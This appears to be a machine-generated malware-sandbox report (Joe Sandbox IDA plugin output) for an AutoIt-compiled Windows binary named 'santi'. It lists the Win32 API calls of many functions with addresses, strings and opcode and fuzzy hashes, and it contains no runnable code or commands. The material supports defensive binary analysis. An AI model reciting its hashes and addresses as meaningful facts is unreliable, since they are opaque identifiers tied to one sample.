                                                                Similarity
                                                                • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                • API String ID: 618562835-2268648507
                                                                • Opcode ID: 1261a9ef504b2108f998bf746f23d606c0271f68e43c5f6275d519ad3ab32663
                                                                • Instruction ID: e323c7555f7926cf60f6df49d80d7900f9d2725ea3be9f96c404626a463034f6
                                                                • Opcode Fuzzy Hash: 1261a9ef504b2108f998bf746f23d606c0271f68e43c5f6275d519ad3ab32663
                                                                • Instruction Fuzzy Hash: 02415C72840258BACB16FBE1DD86DEFB778AF14344F900065F60576092EA74AF19CF60
                                                                APIs
                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0032D0D8
                                                                • __swprintf.LIBCMT ref: 0032D0FA
                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0032D137
                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0032D15C
                                                                • _memset.LIBCMT ref: 0032D17B
                                                                • _wcsncpy.LIBCMT ref: 0032D1B7
                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0032D1EC
                                                                • CloseHandle.KERNEL32(00000000), ref: 0032D1F7
                                                                • RemoveDirectoryW.KERNEL32(?), ref: 0032D200
                                                                • CloseHandle.KERNEL32(00000000), ref: 0032D20A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                • String ID: :$\$\??\%s
                                                                • API String ID: 2733774712-3457252023
                                                                • Opcode ID: 5bcdd404db9024d75be07eb07c0ae1b60b36dc8cae2deff9251ca8ee1d1d0dcc
                                                                • Instruction ID: 36bcbd6bfd6ffb737d5925ad8a325dcf1d5c8b3da96f266b435d2a3fbf0add9c
                                                                • Opcode Fuzzy Hash: 5bcdd404db9024d75be07eb07c0ae1b60b36dc8cae2deff9251ca8ee1d1d0dcc
                                                                • Instruction Fuzzy Hash: BC319675A00219ABDB22DFA0DC49FEB77BCEF89741F1080B6F509D61A1E770D6458B24
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0034BEF4,?,?), ref: 0034E754
                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0034BEF4,?,?,00000000,?), ref: 0034E76B
                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0034BEF4,?,?,00000000,?), ref: 0034E776
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,0034BEF4,?,?,00000000,?), ref: 0034E783
                                                                • GlobalLock.KERNEL32(00000000), ref: 0034E78C
                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0034BEF4,?,?,00000000,?), ref: 0034E79B
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0034E7A4
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,0034BEF4,?,?,00000000,?), ref: 0034E7AB
                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0034BEF4,?,?,00000000,?), ref: 0034E7BC
                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,0036D9BC,?), ref: 0034E7D5
                                                                • GlobalFree.KERNEL32(00000000), ref: 0034E7E5
                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 0034E809
                                                                • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0034E834
                                                                • DeleteObject.GDI32(00000000), ref: 0034E85C
                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0034E872
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                • String ID:
                                                                • API String ID: 3840717409-0
                                                                • Opcode ID: 9fc683bfe1fb75324b26322d0728d967aa5b00fcc974e62826ada97f331592b9
                                                                • Instruction ID: 0f61a95ace0ad2e106feae8cbb9c7f8f87a20ada121722df1aca06d45f0aa547
                                                                • Opcode Fuzzy Hash: 9fc683bfe1fb75324b26322d0728d967aa5b00fcc974e62826ada97f331592b9
                                                                • Instruction Fuzzy Hash: 97413A75A00204EFDB129F65DC48EAA7BBCFF89B21F108458F906DB260D7B1AD41DB20
                                                                APIs
                                                                • __wsplitpath.LIBCMT ref: 0033076F
                                                                • _wcscat.LIBCMT ref: 00330787
                                                                • _wcscat.LIBCMT ref: 00330799
                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003307AE
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 003307C2
                                                                • GetFileAttributesW.KERNEL32(?), ref: 003307DA
                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 003307F4
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00330806
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                • String ID: *.*
                                                                • API String ID: 34673085-438819550
                                                                • Opcode ID: 70eb6d2788e1e214b49183b6ccab0a3d2dc70dfff7523a326d787e5cb6dc724b
                                                                • Instruction ID: a7fa4ba385fcb2367d80df20df251f577f429a29777951427e609281187034dd
                                                                • Opcode Fuzzy Hash: 70eb6d2788e1e214b49183b6ccab0a3d2dc70dfff7523a326d787e5cb6dc724b
                                                                • Instruction Fuzzy Hash: 3E81AF716043459FCB29DF64C8A696EB3E8FB88304F15882EF889DB251E734D954CB92
                                                                APIs
                                                                  • Part of subcall function 002FB34E: GetWindowLongW.USER32(?,000000EB), ref: 002FB35F
                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0034EF3B
                                                                • GetFocus.USER32 ref: 0034EF4B
                                                                • GetDlgCtrlID.USER32(00000000), ref: 0034EF56
                                                                • _memset.LIBCMT ref: 0034F081
                                                                • GetMenuItemInfoW.USER32 ref: 0034F0AC
                                                                • GetMenuItemCount.USER32(00000000), ref: 0034F0CC
                                                                • GetMenuItemID.USER32(?,00000000), ref: 0034F0DF
                                                                • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0034F113
                                                                • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0034F15B
                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0034F193
                                                                • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0034F1C8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                • String ID: 0
                                                                • API String ID: 1296962147-4108050209
                                                                • Opcode ID: 48315379e06f6176dc899c9855162879938ccba25f20597430760b77beea2497
                                                                • Instruction ID: 380aefdeb5601e1f0cca9e838ee6daa23fdb0dab401873eb14a668cc30a2c20d
                                                                • Opcode Fuzzy Hash: 48315379e06f6176dc899c9855162879938ccba25f20597430760b77beea2497
                                                                • Instruction Fuzzy Hash: 7E819D71604311EFDB12CF14C884A6BBBE8FF88314F09492EF9959B291D770E905CBA2
                                                                APIs
                                                                  • Part of subcall function 0031ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0031ABD7
                                                                  • Part of subcall function 0031ABBB: GetLastError.KERNEL32(?,0031A69F,?,?,?), ref: 0031ABE1
                                                                  • Part of subcall function 0031ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0031A69F,?,?,?), ref: 0031ABF0
                                                                  • Part of subcall function 0031ABBB: HeapAlloc.KERNEL32(00000000,?,0031A69F,?,?,?), ref: 0031ABF7
                                                                  • Part of subcall function 0031ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0031AC0E
                                                                  • Part of subcall function 0031AC56: GetProcessHeap.KERNEL32(00000008,0031A6B5,00000000,00000000,?,0031A6B5,?), ref: 0031AC62
                                                                  • Part of subcall function 0031AC56: HeapAlloc.KERNEL32(00000000,?,0031A6B5,?), ref: 0031AC69
                                                                  • Part of subcall function 0031AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0031A6B5,?), ref: 0031AC7A
                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0031A8CB
                                                                • _memset.LIBCMT ref: 0031A8E0
                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0031A8FF
                                                                • GetLengthSid.ADVAPI32(?), ref: 0031A910
                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 0031A94D
                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0031A969
                                                                • GetLengthSid.ADVAPI32(?), ref: 0031A986
                                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0031A995
                                                                • HeapAlloc.KERNEL32(00000000), ref: 0031A99C
                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0031A9BD
                                                                • CopySid.ADVAPI32(00000000), ref: 0031A9C4
                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0031A9F5
                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0031AA1B
                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0031AA2F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                • String ID:
                                                                • API String ID: 3996160137-0
                                                                • Opcode ID: 20ef051115546d0f3b26e7027f5d97d719bca136665f869f71aaed514ff886d4
                                                                • Instruction ID: 2b46bfd58465f2fd6ee50bec75f18ac1c06caa1f0b3300373d604d44f6504426
                                                                • Opcode Fuzzy Hash: 20ef051115546d0f3b26e7027f5d97d719bca136665f869f71aaed514ff886d4
                                                                • Instruction Fuzzy Hash: 38518FB1A01609AFDF16CF90DD44EEEBBB9FF08301F048119F811AB290DB749A45CB61
                                                                APIs
                                                                • GetDC.USER32(00000000), ref: 00339E36
                                                                • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00339E42
                                                                • CreateCompatibleDC.GDI32(?), ref: 00339E4E
                                                                • SelectObject.GDI32(00000000,?), ref: 00339E5B
                                                                • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00339EAF
                                                                • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00339EEB
                                                                • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00339F0F
                                                                • SelectObject.GDI32(00000006,?), ref: 00339F17
                                                                • DeleteObject.GDI32(?), ref: 00339F20
                                                                • DeleteDC.GDI32(00000006), ref: 00339F27
                                                                • ReleaseDC.USER32(00000000,?), ref: 00339F32
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                • String ID: (
                                                                • API String ID: 2598888154-3887548279
                                                                • Opcode ID: dec70ca7d247d90206d45c9e7398a1d4a6a2e9511e1c88c38d0c578da6ddefd5
                                                                • Instruction ID: 4632de28cc82d743794aba21b153a6f4bf76ec4b436c81023f6f59ab3e38230e
                                                                • Opcode Fuzzy Hash: dec70ca7d247d90206d45c9e7398a1d4a6a2e9511e1c88c38d0c578da6ddefd5
                                                                • Instruction Fuzzy Hash: 02515D71A04309EFCB15CFA9DC85EAEBBB9EF49710F14841DF95997210C771A840CB60
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: LoadString__swprintf_wprintf
                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                • API String ID: 2889450990-2391861430
                                                                • Opcode ID: 6adfc1e626a78f7ec5c39bbfbdafe6b91f874cdeed003d06b60f86722e68093c
                                                                • Instruction ID: b8a38e644ac019b970a3211f199386dd6b498f012d617f6bab591897b2519ef9
                                                                • Opcode Fuzzy Hash: 6adfc1e626a78f7ec5c39bbfbdafe6b91f874cdeed003d06b60f86722e68093c
                                                                • Instruction Fuzzy Hash: 9A51ED72850169BACF16EBE0DD42EEEB778AF08304F600065F505760A2EB306F69CF60
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: LoadString__swprintf_wprintf
                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                • API String ID: 2889450990-3420473620
                                                                • Opcode ID: a4cdb5680e2d434dba0cce5e5dd82ba3e1e9a7f4b04f794978d7e00fc8429b0c
                                                                • Instruction ID: 29e2e111e8a76df5c523da13b51570e6c1e12c0dc9fb4101ee3dad6273bdbc57
                                                                • Opcode Fuzzy Hash: a4cdb5680e2d434dba0cce5e5dd82ba3e1e9a7f4b04f794978d7e00fc8429b0c
                                                                • Instruction Fuzzy Hash: 4A51F072850269BACF16EBE1DD42EEEB778AF04344F500065F109760A2EB746F69CF60
                                                                APIs
                                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00342BB5,?,?), ref: 00343C1D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: BuffCharUpper
                                                                • String ID: $E9$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                • API String ID: 3964851224-4260666270
                                                                • Opcode ID: 199a794fb5f8c150b2d78de90e3ec4babe7ba5088a3a85715cee8671f98b72bb
                                                                • Instruction ID: b2fa28784210a1583872186d8afcb66d01687f92e42df8b738dd082ec6f9a915
                                                                • Opcode Fuzzy Hash: 199a794fb5f8c150b2d78de90e3ec4babe7ba5088a3a85715cee8671f98b72bb
                                                                • Instruction Fuzzy Hash: 30415E3451028A8BDF16EF54D851AEB73A5AF23740F524825FC551F2A2EB70AE1BCF10
                                                                APIs
                                                                • _memset.LIBCMT ref: 003255D7
                                                                • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00325664
                                                                • GetMenuItemCount.USER32(003A1708), ref: 003256ED
                                                                • DeleteMenu.USER32(003A1708,00000005,00000000,000000F5,?,?), ref: 0032577D
                                                                • DeleteMenu.USER32(003A1708,00000004,00000000), ref: 00325785
                                                                • DeleteMenu.USER32(003A1708,00000006,00000000), ref: 0032578D
                                                                • DeleteMenu.USER32(003A1708,00000003,00000000), ref: 00325795
                                                                • GetMenuItemCount.USER32(003A1708), ref: 0032579D
                                                                • SetMenuItemInfoW.USER32(003A1708,00000004,00000000,00000030), ref: 003257D3
                                                                • GetCursorPos.USER32(?), ref: 003257DD
                                                                • SetForegroundWindow.USER32(00000000), ref: 003257E6
                                                                • TrackPopupMenuEx.USER32(003A1708,00000000,?,00000000,00000000,00000000), ref: 003257F9
                                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00325805
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                • String ID:
                                                                • API String ID: 3993528054-0
                                                                • Opcode ID: 3042f30c9483d8594a75afb07c64347aa64b080001733dfc85b0fb5f47d9a700
                                                                • Instruction ID: a2661cb5ba0e7b3efe10b7b14281b3135e0c9d492fb9d25f2c6bd4df7c5a5382
                                                                • Instruction Fuzzy Hash: 0C710370740625BFEB229F58EC49FAABF69FF01768F244205F6196A1E0C7B16D10DB90
                                                                APIs
                                                                • _memset.LIBCMT ref: 0031A1DC
                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0031A211
                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0031A22D
                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0031A249
                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0031A273
                                                                • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0031A29B
                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0031A2A6
                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0031A2AB
                                                                Strings
                                                                Similarity
                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                • API String ID: 1687751970-22481851
                                                                • Opcode ID: b95f5ab6e06018073c46d6c9df17f312dd9fd82c17aab46cefe7f6c27f10baa0
                                                                • Instruction ID: 242081a60f5f6b347f5c189ec383d3efc970ecad9a3b92b92f477e44debbfd34
                                                                • Instruction Fuzzy Hash: AD411876C21629ABCF16EBA5DC85DEEB778BF18344F404029E901A7160EB709E55CF50
                                                                APIs
                                                                • __swprintf.LIBCMT ref: 003267FD
                                                                • __swprintf.LIBCMT ref: 0032680A
                                                                  • Part of subcall function 0030172B: __woutput_l.LIBCMT ref: 00301784
                                                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 00326834
                                                                • LoadResource.KERNEL32(?,00000000), ref: 00326840
                                                                • LockResource.KERNEL32(00000000), ref: 0032684D
                                                                • FindResourceW.KERNEL32(?,?,00000003), ref: 0032686D
                                                                • LoadResource.KERNEL32(?,00000000), ref: 0032687F
                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0032688E
                                                                • LockResource.KERNEL32(?), ref: 0032689A
                                                                • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 003268F9
                                                                Strings
                                                                Similarity
                                                                • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                • String ID: 59
                                                                • API String ID: 1433390588-419814946
                                                                • Opcode ID: 7fcfcafef949fa71411cdc1a9d3e8c874a2e8b471ddc35665db98b323df6b849
                                                                • Instruction ID: 24b5bc7f61cd53b4314e122cf3275f9d9b389ebf281699b5bd03f63f4db99226
                                                                • Instruction Fuzzy Hash: 0A31B2B1A0122AABDB129F61ED56EBF7BACFF08340F008825F902D2150E770D951DBB0
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,003536F4,00000010,?,Bad directive syntax error,0037DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 003225D6
                                                                • LoadStringW.USER32(00000000,?,003536F4,00000010), ref: 003225DD
                                                                • _wprintf.LIBCMT ref: 00322610
                                                                • __swprintf.LIBCMT ref: 00322632
                                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 003226A1
                                                                Strings
                                                                Similarity
                                                                • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                • API String ID: 1080873982-4153970271
                                                                • Opcode ID: bf68e8efb0aa9433f90f08392cb04a6e05ccb28b6315051a6d3fae494cc07c63
                                                                • Instruction ID: e47a11a5602382ef121888d12b52c814c3ddc43b9cc98f59315cf2799001c20c
                                                                • Instruction Fuzzy Hash: F921717295026ABFCF12AF90CC4AEEE7B39BF18308F444455F505660A2DBB1A625DF50
                                                                APIs
                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00327B42
                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00327B58
                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00327B69
                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00327B7B
                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00327B8C
                                                                Strings
                                                                Similarity
                                                                • API ID: SendString
                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                • API String ID: 890592661-1007645807
                                                                • Opcode ID: c64795dd71f5889248c31e2b3f207ea340f440c658a54bfa7c382684de41c1a3
                                                                • Instruction ID: 60c010609c31f913cde39a5406043b1159015f3f239693eb806064691fa9bea9
                                                                • Instruction Fuzzy Hash: 4611C8F1AA01A979DB21B7A6DC4ADFFBA7CEB91B00F400419B411A60C1DAB00E45CAB0
                                                                APIs
                                                                • timeGetTime.WINMM ref: 00327794
                                                                  • Part of subcall function 002FDC38: timeGetTime.WINMM(?,75A4B400,003558AB), ref: 002FDC3C
                                                                • Sleep.KERNEL32(0000000A), ref: 003277C0
                                                                • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 003277E4
                                                                • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00327806
                                                                • SetActiveWindow.USER32 ref: 00327825
                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00327833
                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00327852
                                                                • Sleep.KERNEL32(000000FA), ref: 0032785D
                                                                • IsWindow.USER32 ref: 00327869
                                                                • EndDialog.USER32(00000000), ref: 0032787A
                                                                Strings
                                                                Similarity
                                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                • String ID: BUTTON
                                                                • API String ID: 1194449130-3405671355
                                                                • Opcode ID: c84fefa1f651b41ad1a2a84f2d24a99d910eba30c9e274cf875c6ca94dc348a9
                                                                • Instruction ID: bdc2a8170bbba6eebfd0c112b6e579e7500c4f0cac40d116fed239f819e0939b
                                                                • Instruction Fuzzy Hash: 7C2138B4608219AFEB035B25FC8EB667F6DFB46348F058124F547865A2CBB29D10DB21
                                                                APIs
                                                                  • Part of subcall function 002E936C: __swprintf.LIBCMT ref: 002E93AB
                                                                  • Part of subcall function 002E936C: __itow.LIBCMT ref: 002E93DF
                                                                • CoInitialize.OLE32(00000000), ref: 0033034B
                                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003303DE
                                                                • SHGetDesktopFolder.SHELL32(?), ref: 003303F2
